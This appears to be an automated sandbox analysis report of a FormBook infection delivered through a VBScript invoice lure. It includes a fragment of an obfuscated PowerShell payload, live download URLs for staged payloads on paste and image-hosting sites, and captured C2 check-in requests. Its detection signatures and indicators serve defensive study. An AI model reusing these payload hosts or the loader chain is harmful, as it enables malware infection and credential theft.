Tre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

Data Obfuscation

Sigma detected: Powershell download and load assembly

Source: Process started

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 216.40.34.41

Timestamp:	04/17/24-08:40:09.798456
SID:	2855465
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500	Virustotal: Detection: 11%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for submitted file

Source: TNT Invoicing_pdf.vbs	ReversingLabs: Detection: 13%
Source: TNT Invoicing_pdf.vbs	Virustotal: Detection: 10%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.61.152.60:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2

Source:	Binary string: SyncHost.pdbGCTL source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2363857386.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3367182967.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SyncHost.pdb source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 4x nop then pop edi	17_2_05669C46
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 4x nop then xor eax, eax	17_2_0566DE41
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Code function: 4x nop then pop edi	17_2_05669006

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 216.40.34.41:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 104.21.84.67 443

Jump to behavior

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic	HTTP traffic detected: GET /images/004/766/979/original/new_image_vbs.jpg?1712588500 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/766/978/full/new_image_vbs.jpg?1712588469 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /grace/gf.txt HTTP/1.1Host: fanconom.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45
Source: Joe Sandbox View	IP Address: 216.40.34.41 216.40.34.41

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TUCOWSCA TUCOWSCA

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/z0DWX HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/766/979/original/new_image_vbs.jpg?1712588500 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/766/978/full/new_image_vbs.jpg?1712588469 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /grace/gf.txt HTTP/1.1Host: fanconom.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM= HTTP/1.1Host: www.rhyme.academyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000009.00000002.2182091400.000001D05D83B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fanconom.shop
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2640957810.0000021D3D6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2182091400.000001D05BA0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.2640957810.0000021D3D66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2640957810.0000021D3D6BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055511000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000009.00000002.2182091400.000001D05D3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fanconom.shop
Source: powershell.exe, 00000009.00000002.2182091400.000001D05D3A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fanconom.shop/grace/gf.txt
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=expired
Source: wscript.exe, 00000000.00000003.2094313834.00000213EEB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069618451.00000213EEAFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069657201.00000213ED057000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094492166.00000213ED02F000.00000004.00000020.00020000.00000000.sdmp, TNT Invoicing_pdf.vbs	String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: wscript.exe, 00000000.00000002.2097892682.00000213ED002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SyncHost.exe, 0000000D.00000003.2624332335.0000000007648000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000002.2097892682.00000213ED002000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/#
Source: wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/7
Source: wscript.exe, 00000000.00000003.2094492166.00000213ED09C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094891534.00000213ED09F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094225191.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097512994.0000008E9C6F5000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097007069.00000213EF2F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088158638.00000213EEAEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098594812.00000213EF2F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097031089.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087091623.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097156576.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089710059.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098135565.00000213ED0A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090655043.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/z0DWX
Source: wscript.exe, 00000000.00000003.2097007069.00000213EF2F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098594812.00000213EF2F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097031089.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090655043.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/z0DWXp
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000009.00000002.2181470872.000001D053817000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469
Source: powershell.exe, 00000009.00000002.2181470872.000001D053817000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=expired
